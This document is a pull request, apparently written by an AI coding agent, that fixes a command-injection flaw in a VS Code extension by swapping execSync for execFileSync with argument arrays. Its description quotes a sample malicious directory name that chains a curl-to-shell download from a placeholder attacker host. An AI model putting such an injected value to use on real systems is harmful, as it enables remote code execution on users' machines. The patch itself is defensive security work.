### PR TITLE
🛡️ Sentinel: [CRITICAL] Fix command injection in VS Code extension

### DIFF
--- a/.jules/sentinel.md
+++ b/.jules/sentinel.md
@@ -2,3 +2,8 @@
 **Vulnerability:** Found multiple instances where user-controlled inputs (`projectDir`, `filePath`) were interpolated directly into shell commands via `execSync` (e.g., `execSync(\`node "\${cliPath}" init --dir "\${projectDir}"\`)`).
 **Learning:** This is a classic command injection vulnerability. If `projectDir` contains shell metacharacters like `;`, `&&`, or `||`, it allows arbitrary command execution.
 **Prevention:** Always use `execFileSync` (or `execFile` for async) instead of `execSync` when executing commands with dynamic inputs. Pass arguments as an array to ensure they are passed directly to the executable without shell interpolation.
+
+## 2025-05-18 - [RCE in VS Code Extension via Workspace Path]
+**Vulnerability:** The VS Code extension used `execSync` to execute CLI commands within the user's `workspaceDir`. Since `workspaceDir` is user-controlled, opening a maliciously named directory could execute arbitrary shell commands.
+**Learning:** Workspace directory paths in extensions are untrusted user input. Using `execSync` with `cwd` or interpolating the path into the command string allows command injection via shell metacharacters.
+**Prevention:** Always use `execFileSync` with array arguments to prevent shell interpolation. Resolve the absolute path to `.js`/`.mjs` entry points and execute them directly via the `node` binary to avoid unsafe `.cmd` wrapper execution on Windows. Catch `ENOENT` to fallback to `.cmd` only when executing npm binaries directly.

--- a/vscode-extension/extension.js
+++ b/vscode-extension/extension.js
@@ -9,7 +9,7 @@
  */
 
 const vscode = require('vscode');
-const { execSync } = require('child_process');
+const { execFileSync } = require('child_process');
 const path = require('path');
 const fs = require('fs');
 
@@ -20,7 +20,7 @@ let fileWatcher;
 
 // ── Activation ─────────────────────────────────────────────────────────────
 
-function activate(context) {
+async function activate(context) {
   outputChannel = vscode.window.createOutputChannel('SpecGuard');
 
   // Status bar
@@ -172,30 +172,71 @@ function getNodePath() {
 
 function findSpecguard(workspaceDir) {
   // Check local node_modules first
-  const localBin = path.join(workspaceDir, 'node_modules', '.bin', 'specguard');
-  if (fs.existsSync(localBin)) return localBin;
+  const localJs = path.join(workspaceDir, 'node_modules', 'specguard', 'cli', 'docguard.mjs');
+  if (fs.existsSync(localJs)) return localJs;
 
   // Try npx
   return null;
 }
 
-function execSpecguard(workspaceDir, args) {
-  const localBin = findSpecguard(workspaceDir);
+function execSpecguard(workspaceDir, argsString) {
+  const localJs = findSpecguard(workspaceDir);
 
-  let cmd;
-  if (localBin) {
-    cmd = `"${localBin}" ${args}`;
-  } else {
-    cmd = `npx -y specguard ${args}`;
+  // Parse args string into array
+  const args = [];
+  let currentArg = '';
+  let inDoubleQuotes = false;
+  let inSingleQuotes = false;
+  for (let i = 0; i < argsString.length; i++) {
+    const char = argsString[i];
+    if (char === '"' && !inSingleQuotes) {
+      inDoubleQuotes = !inDoubleQuotes;
+    } else if (char === "'" && !inDoubleQuotes) {
+      inSingleQuotes = !inSingleQuotes;
+    } else if (char === ' ' && !inDoubleQuotes && !inSingleQuotes) {
+      if (currentArg.length > 0) {
+        args.push(currentArg);
+        currentArg = '';
+      }
+    } else {
+      currentArg += char;
+    }
+  }
+  if (currentArg.length > 0) {
+    args.push(currentArg);
   }
 
   try {
-    return execSync(cmd, {
-      cwd: workspaceDir,
-      encoding: 'utf-8',
-      env: { ...process.env, NO_COLOR: '1' },
-      timeout: 30000,
-    });
+    if (localJs) {
+      return execFileSync(process.execPath, [localJs, ...args], {
+        cwd: workspaceDir,
+        encoding: 'utf-8',
+        env: { ...process.env, NO_COLOR: '1' },
+        timeout: 30000,
+        stdio: 'pipe'
+      });
+    } else {
+      try {
+        return execFileSync('npx', ['-y', 'specguard', ...args], {
+          cwd: workspaceDir,
+          encoding: 'utf-8',
+          env: { ...process.env, NO_COLOR: '1' },
+          timeout: 30000,
+          stdio: 'pipe'
+        });
+      } catch (e) {
+        if (e.code === 'ENOENT' && process.platform === 'win32') {
+          return execFileSync('npx.cmd', ['-y', 'specguard', ...args], {
+            cwd: workspaceDir,
+            encoding: 'utf-8',
+            env: { ...process.env, NO_COLOR: '1' },
+            timeout: 30000,
+            stdio: 'pipe'
+          });
+        }
+        throw e;
+      }
+    }
   } catch (e) {
     outputChannel.appendLine(`SpecGuard error: ${e.message}`);
     return e.stdout || '';
@@ -243,6 +284,8 @@ async function refreshScore() {
     outputChannel.appendLine(`Score refreshed: ${score}/100 (${grade})`);
   } catch (e) {
     statusBarItem.text = '$(shield) CDD: ?';
+    statusBarItem.tooltip = 'Error fetching CDD score. Click for details.';
+    statusBarItem.backgroundColor = undefined;
     statusBarItem.show();
     outputChannel.appendLine(`Score refresh error: ${e.message}`);
   }


### PR DESCRIPTION
🚨 **Severity**: CRITICAL
💡 **Vulnerability**: Command Injection (RCE). The VS Code extension used `execSync` to execute CLI commands, injecting the user-controlled `workspaceDir` path directly into the shell string. A maliciously named workspace directory (e.g., `test" && curl attacker.com/malware.sh | sh && "`) could execute arbitrary commands when opened.
🎯 **Impact**: Opening a malicious repository in VS Code would trigger arbitrary code execution on the user's machine without any explicit interaction.
🔧 **Fix**: Replaced `execSync` with `execFileSync`. Arguments are now parsed into an array to avoid shell interpolation entirely. Additionally, instead of calling the `.bin` wrapper (which introduces `.cmd` complexities on Windows), the module now directly executes the `.mjs` entrypoint via `process.execPath`. Fixed an `await` syntax error in `activate` and improved status bar error clearing.
✅ **Verification**: Verified using `node -c vscode-extension/extension.js` and confirmed there are no test regressions (`node --test tests/*.test.mjs` passed). RCE payload through `workspaceDir` is fundamentally nullified.

---
*PR created automatically by Jules for task [3010790364216662546](https://jules.google.com/task/3010790364216662546) started by @raccioly*